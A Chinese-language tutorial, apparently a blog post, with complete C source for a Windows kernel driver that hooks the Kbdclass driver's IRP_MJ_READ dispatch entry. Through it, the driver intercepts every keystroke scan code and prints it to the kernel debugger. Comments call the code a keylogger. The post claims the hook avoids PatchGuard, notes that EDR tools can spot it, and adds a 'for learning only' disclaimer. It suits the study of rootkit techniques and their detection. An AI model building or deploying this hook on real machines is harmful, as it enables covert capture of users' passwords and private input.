KEYBOARD FSD HOOK

KEYBOARD FSD HOOK

说明:技术仅供学习使用,如恶意利用,与作者无关!

技术简介

上一篇文章我们讲了 NTFS FSD HOOK。其实这种手法远不止那一个用途:用同样的方式还可以拦截键盘输入、拦截 Create 请求等等。
代码也十分模板化:先用 ObReferenceObjectByName 取得目标驱动对象,再把需要 HOOK 的 MajorFunction 表项替换成我们自己的分发函数,并保存原指针以便转发即可。注意 ObReferenceObjectByName 会给驱动对象加一个引用,本文代码并没有释放它——这恰好保证了在我们的指针还留在对方分发表里时,目标驱动对象不会被销毁。
据我测试,不会触发 PG(至少不会立刻)。但"不触发 PG"不等于隐蔽:分发表中出现一个指向 Kbdclass 映像之外的地址,任何枚举 \Driver\* 对象并核对 MajorFunction 所属模块的工具(ARK/EDR 类)都能直接发现。另外本文代码没有设置 DriverUnload,驱动因此无法被卸载——这反而是唯一安全的状态:否则卸载后 Kbdclass 的分发表仍指向已释放的内存,下一次按键就会蓝屏。

我们驱动的分发函数是这样写的:

DriverObject->MajorFunction[IRP_MJ_CREATE] = (PDRIVER_DISPATCH)NtfsFsdCreate;

我们只要把 MajorFunction[IRP_MJ_CREATE] 换成自己的函数,就能拦截所有 IRP_MJ_CREATE 请求;本文的键盘示例换的则是 \Driver\Kbdclass 的 MajorFunction[IRP_MJ_READ],键盘数据在读请求完成时通过完成例程拿到。

Tips:这里我说一下,FSD HOOK不仅仅是文件系统HOOK,只要是MajorFunction都可以HOOK!

源码

Main.cpp

#include <ntifs.h>
#include <ntddkbd.h>
#include <ntdef.h>
#include <windef.h>

EXTERN_C_START
// ObReferenceObjectByName is exported by ntoskrnl but is not declared in the
// public WDK headers, hence the hand-written prototype.  On success it stores a
// referenced object in *Object; the caller owns that reference (DriverEntry in
// this listing never releases it, which keeps the Kbdclass driver object alive
// while our pointer sits in its dispatch table).
NTSYSAPI NTSTATUS NTAPI ObReferenceObjectByName(
    __in PUNICODE_STRING ObjectName,
    __in ULONG Attributes,
    __in_opt PACCESS_STATE AccessState,
    __in_opt ACCESS_MASK DesiredAccess,
    __in POBJECT_TYPE ObjectType,
    __in KPROCESSOR_MODE AccessMode,
    __inout_opt PVOID ParseContext,
    __out PVOID* Object
);

// Exported object-type pointer for driver objects; dereferenced
// (*IoDriverObjectType) when looking up \Driver\Kbdclass.
extern POBJECT_TYPE* IoDriverObjectType;
EXTERN_C_END

// Signature shared by every IRP_MJ_* dispatch routine (PDRIVER_DISPATCH spelled
// out by hand); used to hold Kbdclass's original IRP_MJ_READ handler.
typedef NTSTATUS(*IRP_MJ_SERIES)
(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    );

IRP_MJ_SERIES KbdRead = NULL;   // Kbdclass's original IRP_MJ_READ dispatch routine, saved by DriverEntry
PDRIVER_OBJECT KbdDrvObj;       // \Driver\Kbdclass driver object, referenced (and never released) in DriverEntry
static int KbdStatus = 4;       // not referenced anywhere in this listing

// Scan-code -> ASCII lookup: four planes of 84 entries each (indices 0x00-0x53),
// labelled by the row comments as normal / caps / shift / caps+shift.  The
// layout (0x1B at index 1, digits at 0x02-0x0B, 'q' at 0x10) matches
// keyboard scan-code set 1 make codes.  Nothing in this listing indexes the
// table -- the completion routine only prints MakeCode -- so it is presumably
// left over from a key-to-character translation step that is not shown here.
CONST BYTE AsciiTable[] = {
    0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09,    //normal
    0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,
    0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,
    0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09,    //caps
    0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,
    0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,
    0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09,    //shift
    0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,
    0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,
    0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09,    //caps + shift
    0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,
    0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,
    0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E
};

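// Bookkeeping saved by Fake_KbdDispatchRead and consumed (then freed) by
// Fake_KbdFsdReadCompletion.  The original code kept only the displaced
// completion routine, stuffed into the stack location's Context slot, and so
// called that routine with a NULL Context and with our SL_INVOKE_ON_* flags
// instead of its own.  Keeping all three pieces lets us hand the IRP back
// exactly as the I/O manager would have.
//
// Allocated from non-paged pool: keyboard read IRPs can complete at
// DISPATCH_LEVEL, where paged memory must not be touched.
typedef struct _KBD_HOOK_CONTEXT
{
    PIO_COMPLETION_ROUTINE OrigRoutine;   // completion routine the upper driver installed (may be NULL)
    PVOID                  OrigContext;   // the Context that routine expects to receive
    UCHAR                  OrigControl;   // its SL_INVOKE_ON_* flags
} KBD_HOOK_CONTEXT, *PKBD_HOOK_CONTEXT;

#define KBD_HOOK_TAG 'kHbK'

// Completion routine installed on Kbdclass's own stack location for every
// IRP_MJ_READ.  This is the keylogger's sink: every KEYBOARD_INPUT_DATA record
// the class driver returned is printed to the kernel debugger, after which the
// IRP is forwarded to the completion routine we displaced, using the Context
// and invocation flags that routine originally registered.
//
// Context is the KBD_HOOK_CONTEXT allocated by Fake_KbdDispatchRead; it is
// freed here on every path.  Returns whatever the displaced routine returns
// (so STATUS_MORE_PROCESSING_REQUIRED still propagates), else STATUS_SUCCESS.
NTSTATUS Fake_KbdFsdReadCompletion(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
    PKBD_HOOK_CONTEXT hook = (PKBD_HOOK_CONTEXT)Context;
    NTSTATUS status = Irp->IoStatus.Status;

    if (NT_SUCCESS(status) && Irp->AssociatedIrp.SystemBuffer != NULL)
    {
        // Kbdclass returns an array of KEYBOARD_INPUT_DATA; IoStatus.Information
        // is the byte count actually filled in, which may be zero or span several
        // records.  The original read only the first record and never checked
        // the length.  Test KEY_BREAK explicitly: Flags also carries KEY_E0/KEY_E1
        // for extended keys, so "Flags != 0" mislabelled their make events as UP.
        PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
        ULONG_PTR count = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);
        for (ULONG_PTR i = 0; i < count; i++)
        {
            KdPrint(("%sScanCode:%x\n", (keys[i].Flags & KEY_BREAK) ? "UP: " : "DOWN: ", keys[i].MakeCode));
        }
    }

    // Standard rule for any completion routine: propagate a pending return.
    if (Irp->PendingReturned)
        IoMarkIrpPending(Irp);

    if (hook == NULL)
        return STATUS_SUCCESS;   // never installed without a context; nothing to forward to

    PIO_COMPLETION_ROUTINE routine = hook->OrigRoutine;
    PVOID origContext = hook->OrigContext;
    UCHAR control = hook->OrigControl;
    ExFreePoolWithTag(hook, KBD_HOOK_TAG);

    // Reproduce the I/O manager's own invocation rule so the displaced routine
    // only sees the completions it asked for.
    BOOLEAN invoke = FALSE;
    if (routine != NULL)
    {
        if (NT_SUCCESS(status))
            invoke = (control & SL_INVOKE_ON_SUCCESS) != 0;
        else
            invoke = (control & SL_INVOKE_ON_ERROR) != 0;
        if (Irp->Cancel && (control & SL_INVOKE_ON_CANCEL))
            invoke = TRUE;
    }

    if (invoke)
        return routine(DeviceObject, Irp, origContext);

    return STATUS_SUCCESS;
}

// Replacement for Kbdclass's IRP_MJ_READ dispatch entry (installed by
// DriverEntry).  Saves whatever completion routine/context/flags are already on
// Kbdclass's stack location, installs Fake_KbdFsdReadCompletion in their place
// so the data is observed on the way back, and forwards the IRP to the real
// dispatch routine kept in KbdRead.
//
// If the bookkeeping block cannot be allocated the IRP is passed through
// untouched: missing one read is preferable to corrupting the upper driver's
// completion chain.  Returns whatever the original dispatch routine returns.
NTSTATUS Fake_KbdDispatchRead(IN PDEVICE_OBJECT pDeviceObject, IN PIRP pIrp)
{
    PIO_STACK_LOCATION irpSp = IoGetCurrentIrpStackLocation(pIrp);
    // ExAllocatePool2(POOL_FLAG_NON_PAGED, ...) is the replacement on WDKs that
    // deprecate this call; either way the block must be non-paged (see above).
    PKBD_HOOK_CONTEXT hook = (PKBD_HOOK_CONTEXT)ExAllocatePoolWithTag(NonPagedPoolNx, sizeof(KBD_HOOK_CONTEXT), KBD_HOOK_TAG);

    if (hook != NULL)
    {
        // Only a stack location above ours can have set a completion routine;
        // with a single location the field is not meaningful (the original code
        // applied the same StackCount guard at completion time).
        hook->OrigRoutine = (pIrp->StackCount > 1) ? irpSp->CompletionRoutine : NULL;
        hook->OrigContext = irpSp->Context;
        hook->OrigControl = irpSp->Control;

        // Ask to be invoked on every outcome; the completion routine re-applies
        // the displaced routine's own flags before forwarding.
        irpSp->Control = SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL;
        irpSp->Context = hook;
        irpSp->CompletionRoutine = Fake_KbdFsdReadCompletion;
    }

    return KbdRead(pDeviceObject, pIrp);
}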

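// Driver entry point.  Looks up the \Driver\Kbdclass driver object and swaps
// its IRP_MJ_READ dispatch pointer for Fake_KbdDispatchRead, keeping the
// original in KbdRead so the hook can forward to it.
//
// The reference taken by ObReferenceObjectByName is never released and no
// DriverUnload is set: the I/O manager therefore refuses to unload this driver,
// which is the only safe state while Kbdclass's dispatch table points into our
// image (an unload would leave a dangling pointer that faults on the next
// keystroke).  Note that a MajorFunction entry pointing outside the Kbdclass
// image is exactly what driver-object integrity checks look for.
//
// Returns STATUS_SUCCESS once the hook is installed, otherwise the failure
// status from ObReferenceObjectByName (e.g. when Kbdclass is not loaded).
EXTERN_C NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath)
{
    UNREFERENCED_PARAMETER(pDriverObject);
    UNREFERENCED_PARAMETER(pRegistryPath);

    UNICODE_STRING uniKbdDrvName = RTL_CONSTANT_STRING(L"\\Driver\\Kbdclass");
    NTSTATUS ntStatus = ObReferenceObjectByName(&uniKbdDrvName, OBJ_CASE_INSENSITIVE, NULL, 0,
                                                *IoDriverObjectType, KernelMode, NULL, (PVOID*)&KbdDrvObj);
    if (!NT_SUCCESS(ntStatus))
    {
        KdPrint(("KBD FSD HOOK Fail... Errorcode:%08X\n", ntStatus));
        return ntStatus;
    }

    // A successful lookup already yields a valid, referenced object, so the
    // original MmIsAddressValid() probe added nothing.  Exchange a pointer, not a
    // 64-bit integer: MajorFunction entries are pointer-sized, so on a 32-bit
    // build InterlockedExchange64 would also overwrite the neighbouring
    // MajorFunction[IRP_MJ_WRITE] slot.
    KbdRead = (IRP_MJ_SERIES)InterlockedExchangePointer(
        (PVOID volatile*)&KbdDrvObj->MajorFunction[IRP_MJ_READ],
        (PVOID)Fake_KbdDispatchRead);

    return ntStatus;
}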
